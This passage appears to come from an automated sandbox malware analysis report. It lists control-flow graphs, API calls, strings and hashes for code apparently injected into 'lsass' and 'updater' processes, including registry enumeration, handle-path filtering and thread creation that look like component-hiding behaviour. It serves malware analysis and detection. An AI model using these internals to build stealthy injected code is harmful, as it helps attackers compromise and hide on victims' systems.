                                                                          • Source File: 0000001C.00000002.2443890985.00007FF72AF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF72AF20000, based on PE: true
                                                                          • Associated: 0000001C.00000002.2443853890.00007FF72AF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2443968858.00007FF72AF29000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2444024582.00007FF72AF2B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2444683131.00007FF72B1DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_28_2_7ff72af20000_updater.jbxd
                                                                          Similarity
                                                                          • API ID: fprintf
                                                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                          • API String ID: 383729395-3474627141
                                                                          • Opcode ID: 6dc62383441ec21015d1a93eb8b73b3a2626f1b89f937b38c1cf0d1080ec3dd9
                                                                          • Instruction ID: 4c4efa94e8fa5ea027618983b2c4cc91207d35402f8223732b2e5ca8a93e5e2b
                                                                          • Opcode Fuzzy Hash: 6dc62383441ec21015d1a93eb8b73b3a2626f1b89f937b38c1cf0d1080ec3dd9
                                                                          • Instruction Fuzzy Hash: 1EF0C221E08A8583F721BB35AD810BDE361EB593C0FD09271DE4D53251DF2CE2828B10
                                                                          Function 00007FF72AF2219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001C.00000002.2443890985.00007FF72AF21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF72AF20000, based on PE: true
                                                                          • Associated: 0000001C.00000002.2443853890.00007FF72AF20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2443968858.00007FF72AF29000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2444024582.00007FF72AF2B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                          • Associated: 0000001C.00000002.2444683131.00007FF72B1DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_28_2_7ff72af20000_updater.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                          • String ID:
                                                                          • API String ID: 682475483-0
                                                                          • Opcode ID: d38a7a66502803ee60ea24eddf2a71f1e95afdba96137525794505a2f4712398
                                                                          • Instruction ID: 248b4b24ea7c9033a91c418552e7ed4224e3cd950cba69bf34c464fa56714964
                                                                          • Opcode Fuzzy Hash: d38a7a66502803ee60ea24eddf2a71f1e95afdba96137525794505a2f4712398
                                                                          • Instruction Fuzzy Hash: 8501D625A0964393F755BB15AE44678E260FF05B94FC500B1CE0D53AA4DF2DEA958A20

                                                                          Execution Graph

                                                                          Execution Coverage:0.9%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:131
                                                                          Total number of Limit Nodes:10
                                                                          execution_graph 14899 140adfc273c 14901 140adfc276a 14899->14901 14900 140adfc2858 LoadLibraryA 14900->14901 14901->14900 14902 140adfc28d4 14901->14902 14903 140ae86202c 14905 140ae86205d 14903->14905 14904 140ae86213e 14905->14904 14906 140ae862173 14905->14906 14912 140ae862081 14905->14912 14907 140ae8621e7 14906->14907 14908 140ae862178 14906->14908 14907->14904 14911 140ae862f04 7 API calls 14907->14911 14921 140ae862f04 GetProcessHeap 14908->14921 14910 140ae8620b9 StrCmpNIW 14910->14912 14911->14904 14912->14904 14912->14910 14914 140ae861bf4 14912->14914 14915 140ae861c8b __free_lconv_mon 14914->14915 14916 140ae861c1b GetProcessHeap 14914->14916 14915->14912 14918 140ae861c41 _invalid_parameter_noinfo 14916->14918 14917 140ae861c77 GetProcessHeap 14917->14915 14918->14915 14918->14917 14928 140ae86152c 14918->14928 14926 140ae862f40 _invalid_parameter_noinfo 14921->14926 14922 140ae863015 GetProcessHeap 14923 140ae863029 __free_lconv_mon 14922->14923 14923->14904 14924 140ae863010 14924->14922 14925 140ae862fa2 StrCmpNIW 14925->14926 14926->14922 14926->14924 14926->14925 14927 140ae861bf4 4 API calls 14926->14927 14927->14926 14929 140ae86157c 14928->14929 14932 140ae861546 14928->14932 14929->14917 14930 140ae861565 StrCmpW 14930->14932 14931 140ae86155d StrCmpIW 14931->14932 14932->14929 14932->14930 14932->14931 14933 140ae861abc 14939 140ae861628 GetProcessHeap 14933->14939 14935 140ae861ad2 Sleep SleepEx 14937 140ae861acb 14935->14937 14937->14935 14938 140ae861598 StrCmpIW StrCmpW 14937->14938 14984 140ae8618b4 14937->14984 14938->14937 14940 140ae861648 _invalid_parameter_noinfo 14939->14940 15001 140ae861268 GetProcessHeap 14940->15001 14942 140ae861650 14943 140ae861268 2 API calls 14942->14943 14944 140ae861661 14943->14944 14945 140ae861268 2 API calls 14944->14945 14946 140ae86166a 14945->14946 14947 140ae861268 2 API calls 14946->14947 14948 140ae861673 14947->14948 14949 140ae86168e RegOpenKeyExW 14948->14949 14950 140ae8618a6 14949->14950 14951 140ae8616c0 RegOpenKeyExW 14949->14951 14950->14937 14952 140ae8616ff RegOpenKeyExW 14951->14952 14953 140ae8616e9 14951->14953 14955 140ae861723 14952->14955 14956 140ae86173a RegOpenKeyExW 14952->14956 15005 140ae8612bc RegQueryInfoKeyW 14953->15005 15016 140ae86104c RegQueryInfoKeyW 14955->15016 14959 140ae861775 RegOpenKeyExW 14956->14959 14960 140ae86175e 14956->14960 14957 140ae8616f5 RegCloseKey 14957->14952 14961 140ae8617b0 RegOpenKeyExW 14959->14961 14962 140ae861799 14959->14962 14964 140ae8612bc 11 API calls 14960->14964 14967 140ae8617d4 14961->14967 14968 140ae8617eb RegOpenKeyExW 14961->14968 14966 140ae8612bc 11 API calls 14962->14966 14965 140ae86176b RegCloseKey 14964->14965 14965->14959 14969 140ae8617a6 RegCloseKey 14966->14969 14970 140ae8612bc 11 API calls 14967->14970 14971 140ae861826 RegOpenKeyExW 14968->14971 14972 140ae86180f 14968->14972 14969->14961 14973 140ae8617e1 RegCloseKey 14970->14973 14975 140ae861861 RegOpenKeyExW 14971->14975 14976 140ae86184a 14971->14976 14974 140ae86104c 4 API calls 14972->14974 14973->14968 14979 140ae86181c RegCloseKey 14974->14979 14977 140ae861885 14975->14977 14978 140ae86189c RegCloseKey 14975->14978 14980 140ae86104c 4 API calls 14976->14980 14982 140ae86104c 4 API calls 14977->14982 14978->14950 14979->14971 14981 140ae861857 RegCloseKey 14980->14981 14981->14975 14983 140ae861892 RegCloseKey 14982->14983 14983->14978 15023 140ae8614a4 14984->15023 15022 140ae876168 15001->15022 15003 140ae861283 GetProcessHeap 15004 140ae8612ae _invalid_parameter_noinfo 15003->15004 15004->14942 15006 140ae861327 GetProcessHeap 15005->15006 15007 140ae86148a __free_lconv_mon 15005->15007 15013 140ae86133e _invalid_parameter_noinfo __free_lconv_mon 15006->15013 15007->14957 15008 140ae861476 GetProcessHeap 15008->15007 15009 140ae861352 RegEnumValueW 15009->15013 15010 140ae86152c 2 API calls 15010->15013 15011 140ae8613d3 GetProcessHeap 15011->15013 15012 140ae86141e lstrlenW GetProcessHeap 15012->15013 15013->15008 15013->15009 15013->15010 15013->15011 15013->15012 15014 140ae8613f3 GetProcessHeap 15013->15014 15015 140ae861443 StrCpyW 15013->15015 15014->15013 15015->15013 15017 140ae8611b5 RegCloseKey 15016->15017 15018 140ae8610bf _invalid_parameter_noinfo __free_lconv_mon 15016->15018 15017->14956 15018->15017 15019 140ae8610cf RegEnumValueW 15018->15019 15020 140ae86114e GetProcessHeap 15018->15020 15021 140ae86116e GetProcessHeap 15018->15021 15019->15018 15020->15018 15021->15018 15024 140ae8614e1 GetProcessHeap 15023->15024 15025 140ae8614c1 GetProcessHeap 15023->15025 15029 140ae876180 15024->15029 15026 140ae8614da __free_lconv_mon 15025->15026 15026->15024 15026->15025 15030 140ae876182 15029->15030 15031 140ae86253c 15033 140ae8625bb 15031->15033 15032 140ae8627aa 15033->15032 15034 140ae86261d GetFileType 15033->15034 15035 140ae862641 15034->15035 15036 140ae86262b StrCpyW 15034->15036 15047 140ae861a40 GetFinalPathNameByHandleW 15035->15047 15037 140ae862650 15036->15037 15041 140ae86265a 15037->15041 15045 140ae8626ff 15037->15045 15040 140ae863844 StrCmpNIW 15040->15045 15041->15032 15052 140ae863844 15041->15052 15055 140ae863044 StrCmpIW 15041->15055 15059 140ae861cac 15041->15059 15044 140ae863044 4 API calls 15044->15045 15045->15032 15045->15040 15045->15044 15046 140ae861cac 2 API calls 15045->15046 15046->15045 15048 140ae861a6a StrCmpNIW 15047->15048 15049 140ae861aa9 15047->15049 15048->15049 15050 140ae861a84 lstrlenW 15048->15050 15049->15037 15050->15049 15051 140ae861a96 StrCpyW 15050->15051 15051->15049 15053 140ae863851 StrCmpNIW 15052->15053 15054 140ae863866 15052->15054 15053->15054 15054->15041 15056 140ae863076 StrCpyW StrCatW 15055->15056 15057 140ae86308d PathCombineW 15055->15057 15058 140ae863096 15056->15058 15057->15058 15058->15041 15060 140ae861cc3 15059->15060 15062 140ae861ccc 15059->15062 15061 140ae86152c 2 API calls 15060->15061 15061->15062 15062->15041

                                                                          Executed Functions

                                                                          Function 00000140AE86253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 5 140ae86253c-140ae8625c0 call 140ae882cc0 8 140ae8625c6-140ae8625c9 5->8 9 140ae8627d8-140ae8627fb 5->9 8->9 10 140ae8625cf-140ae8625dd 8->10 10->9 11 140ae8625e3-140ae862629 call 140ae868c60 * 3 GetFileType 10->11 18 140ae862641-140ae86264b call 140ae861a40 11->18 19 140ae86262b-140ae86263f StrCpyW 11->19 20 140ae862650-140ae862654 18->20 19->20 22 140ae8626ff-140ae862704 20->22 23 140ae86265a-140ae862673 call 140ae8630a8 call 140ae863844 20->23 24 140ae862707-140ae86270c 22->24 36 140ae862675-140ae8626a4 call 140ae8630a8 call 140ae863044 call 140ae861cac 23->36 37 140ae8626aa-140ae8626f4 call 140ae882cc0 23->37 26 140ae86270e-140ae862711 24->26 27 140ae862729 24->27 26->27 29 140ae862713-140ae862716 26->29 31 140ae86272c-140ae862745 call 140ae8630a8 call 140ae863844 27->31 29->27 32 140ae862718-140ae86271b 29->32 47 140ae862787-140ae862789 31->47 48 140ae862747-140ae862776 call 140ae8630a8 call 140ae863044 call 140ae861cac 31->48 32->27 35 140ae86271d-140ae862720 32->35 35->27 39 140ae862722-140ae862727 35->39 36->9 36->37 37->9 49 140ae8626fa 37->49 39->27 39->31 50 140ae8627aa-140ae8627ad 47->50 51 140ae86278b-140ae8627a5 47->51 48->47 68 140ae862778-140ae862783 48->68 49->23 54 140ae8627b7-140ae8627ba 50->54 55 140ae8627af-140ae8627b5 50->55 51->24 58 140ae8627d5 54->58 59 140ae8627bc-140ae8627bf 54->59 55->9 58->9 59->58 63 140ae8627c1-140ae8627c4 59->63 63->58 65 140ae8627c6-140ae8627c9 63->65 65->58 67 140ae8627cb-140ae8627ce 65->67 67->58 69 140ae8627d0-140ae8627d3 67->69 68->9 70 140ae862785 68->70 69->9 69->58 70->24
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction ID: 006047059f567fc424369bd4eaabb636d5541b44e56c09e15fbbbd16066aee87
                                                                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                          • Instruction Fuzzy Hash: 6E71173624078185EB26DF2BD8407EAA790F38D7A4F640126DF0D5BBA9DE34CE45C382
                                                                          Function 00000140AE86202C Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 162COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 71 140ae86202c-140ae862057 call 140ae882d00 73 140ae86205d-140ae862066 71->73 74 140ae86206f-140ae862072 73->74 75 140ae862068-140ae86206c 73->75 76 140ae862223-140ae862243 74->76 77 140ae862078-140ae86207b 74->77 75->74 78 140ae862173-140ae862176 77->78 79 140ae862081-140ae862093 77->79 81 140ae8621e7-140ae8621ea 78->81 82 140ae862178-140ae862192 call 140ae862f04 78->82 79->76 80 140ae862099-140ae8620a5 79->80 83 140ae8620a7-140ae8620b7 80->83 84 140ae8620d3-140ae8620de call 140ae861bbc 80->84 81->76 85 140ae8621ec-140ae8621ff call 140ae862f04 81->85 82->76 94 140ae862198-140ae8621ae 82->94 83->84 87 140ae8620b9-140ae8620d1 StrCmpNIW 83->87 91 140ae8620ff-140ae862111 84->91 96 140ae8620e0-140ae8620f8 call 140ae861bf4 84->96 85->76 95 140ae862201-140ae862209 85->95 87->84 87->91 97 140ae862113-140ae862115 91->97 98 140ae862121-140ae862123 91->98 94->76 99 140ae8621b0-140ae8621cc 94->99 95->76 100 140ae86220b-140ae862213 95->100 96->91 113 140ae8620fa-140ae8620fd 96->113 102 140ae862117-140ae86211a 97->102 103 140ae86211c-140ae86211f 97->103 104 140ae862125-140ae862128 98->104 105 140ae86212a 98->105 106 140ae8621d0-140ae8621e3 99->106 109 140ae862216-140ae862221 100->109 107 140ae86212d-140ae862130 102->107 103->107 104->107 105->107 106->106 108 140ae8621e5 106->108 111 140ae862132-140ae862138 107->111 112 140ae86213e-140ae862141 107->112 108->76 109->76 109->109 111->80 111->112 112->76 114 140ae862147-140ae86214b 112->114 113->107 115 140ae862162-140ae86216e 114->115 116 140ae86214d-140ae862150 114->116 115->76 116->76 117 140ae862156-140ae86215b 116->117 117->114 118 140ae86215d 117->118 118->76
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: S$dialer
                                                                          • API String ID: 756756679-3873981283
                                                                          • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                          • Instruction ID: 6995ce01178be5ec7128772deebd1550e485b351504c4b94060f668f1040f1af
                                                                          • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                          • Instruction Fuzzy Hash: 6E51BE32B5572486EB62CB2BA8406EDA3F5F7087A4F249451DF0D13BA5DB35DC91C382
                                                                          Function 00000140AE861A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                          • String ID: \\?\
                                                                          • API String ID: 2719912262-4282027825
                                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction ID: c3158435ef4687b1766e3257663a9035ab9b0d40d8f3ba1c44d0f0f8ec37f8a1
                                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                          • Instruction Fuzzy Hash: 7DF03C3274474192EB618B22E9847996760F74CBE9FA44020DF4D47979DE3DCA8DCB41
                                                                          Function 00000140AE86328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                          • String ID:
                                                                          • API String ID: 1683269324-0
                                                                          • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction ID: 3ba806e3e51b1b0dcb359024cf54f050519727a8cf8c5b8b8f5a43b5e8428739
                                                                          • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                          • Instruction Fuzzy Hash: BA115E30A9478082F7639B23B9153D922D4B79C765FB041249F4E875B1EF78C844C2C2
                                                                          Function 00000140AE861ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00000140AE861628: GetProcessHeap.KERNEL32 ref: 00000140AE861633
                                                                            • Part of subcall function 00000140AE861628: HeapAlloc.KERNEL32 ref: 00000140AE861642
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8616B2
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8616DF
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8616F9
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861719
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861734
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861754
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE86176F
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86178F
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8617AA
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE8617CA
                                                                          • Sleep.KERNEL32 ref: 00000140AE861AD7
                                                                          • SleepEx.KERNEL32 ref: 00000140AE861ADD
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8617E5
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861805
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861820
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE861840
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE86185B
                                                                            • Part of subcall function 00000140AE861628: RegOpenKeyExW.ADVAPI32 ref: 00000140AE86187B
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE861896
                                                                            • Part of subcall function 00000140AE861628: RegCloseKey.ADVAPI32 ref: 00000140AE8618A0
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                          • String ID:
                                                                          • API String ID: 1534210851-0
                                                                          • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction ID: 326f40d2db6ff263f8e0a940b391fb73a78b65f37836ebd93bce5d4d1fbe3847
                                                                          • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                          • Instruction Fuzzy Hash: 2631CC7128074181FF529B27DA513E963A5AB8CBE4F2858219F1E877B7EF34CC51C292
                                                                          Function 00000140ADFC273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 176 140adfc273c-140adfc27a4 call 140adfc29d4 * 4 185 140adfc27aa-140adfc27ad 176->185 186 140adfc29b2 176->186 185->186 188 140adfc27b3-140adfc27b6 185->188 187 140adfc29b4-140adfc29d0 186->187 188->186 189 140adfc27bc-140adfc27bf 188->189 189->186 190 140adfc27c5-140adfc27e6 189->190 190->186 192 140adfc27ec-140adfc280c 190->192 193 140adfc280e-140adfc2836 192->193 194 140adfc2838-140adfc283f 192->194 193->193 193->194 195 140adfc28df-140adfc28e6 194->195 196 140adfc2845-140adfc2852 194->196 198 140adfc28ec-140adfc2901 195->198 199 140adfc2992-140adfc29b0 195->199 196->195 197 140adfc2858-140adfc286a LoadLibraryA 196->197 200 140adfc286c-140adfc2878 197->200 201 140adfc28ca-140adfc28d2 197->201 198->199 202 140adfc2907 198->202 199->187 204 140adfc28c5-140adfc28c8 200->204 201->197 205 140adfc28d4-140adfc28d9 201->205 203 140adfc290d-140adfc2921 202->203 207 140adfc2982-140adfc298c 203->207 208 140adfc2923-140adfc2934 203->208 204->201 209 140adfc287a-140adfc287d 204->209 205->195 207->199 207->203 210 140adfc293f-140adfc2943 208->210 211 140adfc2936-140adfc293d 208->211 212 140adfc287f-140adfc28a5 209->212 213 140adfc28a7-140adfc28b7 209->213 216 140adfc294d-140adfc2951 210->216 217 140adfc2945-140adfc294b 210->217 215 140adfc2970-140adfc2980 211->215 218 140adfc28ba-140adfc28c1 212->218 213->218 215->207 215->208 219 140adfc2963-140adfc2967 216->219 220 140adfc2953-140adfc2961 216->220 217->215 218->204 219->215 222 140adfc2969-140adfc296c 219->222 220->215 222->215
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3602728179.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction ID: 06fb5e1ef4416040f010e1a7d6ba73e71e6e03eebacef6a42692c0d9d5c867cd
                                                                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                          • Instruction Fuzzy Hash: 10610732B2179887DB65CF1690407AE7393FB58B98F688121DF5907BD4DA38D863E700

                                                                          Non-executed Functions

                                                                          Function 00000140AE862B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 484 140ae862b2c-140ae862ba5 call 140ae882ce0 487 140ae862ee0-140ae862f03 484->487 488 140ae862bab-140ae862bb1 484->488 488->487 489 140ae862bb7-140ae862bba 488->489 489->487 490 140ae862bc0-140ae862bc3 489->490 490->487 491 140ae862bc9-140ae862bd9 GetModuleHandleA 490->491 492 140ae862bed 491->492 493 140ae862bdb-140ae862beb call 140ae876090 491->493 495 140ae862bf0-140ae862c0e 492->495 493->495 495->487 498 140ae862c14-140ae862c33 StrCmpNIW 495->498 498->487 499 140ae862c39-140ae862c3d 498->499 499->487 500 140ae862c43-140ae862c4d 499->500 500->487 501 140ae862c53-140ae862c5a 500->501 501->487 502 140ae862c60-140ae862c73 501->502 503 140ae862c75-140ae862c81 502->503 504 140ae862c83 502->504 505 140ae862c86-140ae862c8a 503->505 504->505 506 140ae862c8c-140ae862c98 505->506 507 140ae862c9a 505->507 508 140ae862c9d-140ae862ca7 506->508 507->508 509 140ae862d9d-140ae862da1 508->509 510 140ae862cad-140ae862cb0 508->510 511 140ae862da7-140ae862daa 509->511 512 140ae862ed2-140ae862eda 509->512 513 140ae862cc2-140ae862ccc 510->513 514 140ae862cb2-140ae862cbf call 140ae86199c 510->514 515 140ae862dac-140ae862db8 call 140ae86199c 511->515 516 140ae862dbb-140ae862dc5 511->516 512->487 512->502 518 140ae862d00-140ae862d0a 513->518 519 140ae862cce-140ae862cdb 513->519 514->513 515->516 523 140ae862dc7-140ae862dd4 516->523 524 140ae862df5-140ae862df8 516->524 520 140ae862d0c-140ae862d19 518->520 521 140ae862d3a-140ae862d3d 518->521 519->518 526 140ae862cdd-140ae862cea 519->526 520->521 527 140ae862d1b-140ae862d28 520->527 528 140ae862d3f-140ae862d49 call 140ae861bbc 521->528 529 140ae862d4b-140ae862d58 lstrlenW 521->529 523->524 531 140ae862dd6-140ae862de3 523->531 532 140ae862e05-140ae862e12 lstrlenW 524->532 533 140ae862dfa-140ae862e03 call 140ae861bbc 524->533 534 140ae862ced-140ae862cf3 526->534 539 140ae862d2b-140ae862d31 527->539 528->529 535 140ae862d93-140ae862d98 528->535 541 140ae862d5a-140ae862d64 529->541 542 140ae862d7b-140ae862d8d call 140ae863844 529->542 543 140ae862de6-140ae862dec 531->543 537 140ae862e14-140ae862e1e 532->537 538 140ae862e35-140ae862e3f call 140ae863844 532->538 533->532 554 140ae862e4a-140ae862e55 533->554 534->535 536 140ae862cf9-140ae862cfe 534->536 547 140ae862e42-140ae862e44 535->547 536->518 536->534 537->538 548 140ae862e20-140ae862e33 call 140ae86152c 537->548 538->547 539->535 549 140ae862d33-140ae862d38 539->549 541->542 552 140ae862d66-140ae862d79 call 140ae86152c 541->552 542->535 542->547 553 140ae862dee-140ae862df3 543->553 543->554 547->512 547->554 548->538 548->554 549->521 549->539 552->535 552->542 553->524 553->543 558 140ae862e57-140ae862e5b 554->558 559 140ae862ecc-140ae862ed0 554->559 562 140ae862e63-140ae862e7d call 140ae8685c0 558->562 563 140ae862e5d-140ae862e61 558->563 559->512 565 140ae862e80-140ae862e83 562->565 563->562 563->565 567 140ae862ea6-140ae862ea9 565->567 568 140ae862e85-140ae862ea3 call 140ae8685c0 565->568 567->559 571 140ae862eab-140ae862ec9 call 140ae8685c0 567->571 568->567 571->559
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                          • API String ID: 2119608203-3850299575
                                                                          • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction ID: bf2ef32ac57e5f465ce725a7a74baab9ea04f71ed1d086599ba6561ce8fa9f42
                                                                          • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                          • Instruction Fuzzy Hash: 2AB19E72250B5486EB668F2BD4407E9A3A5FB48BA4F645066EF4D53BB5DF34CC40C382
                                                                          Function 00000140AE867D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                          • String ID:
                                                                          • API String ID: 3140674995-0
                                                                          • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction ID: 1503c4d1f0e9a2face0525283fdd9087e61cbfeab21d2c89dc1035b309a16709
                                                                          • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                          • Instruction Fuzzy Hash: 2131A372245B808AEB618F61E8407ED7361F788754F64442ADF4D47BA8EF38C948C790
                                                                          Function 00000140AE86D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
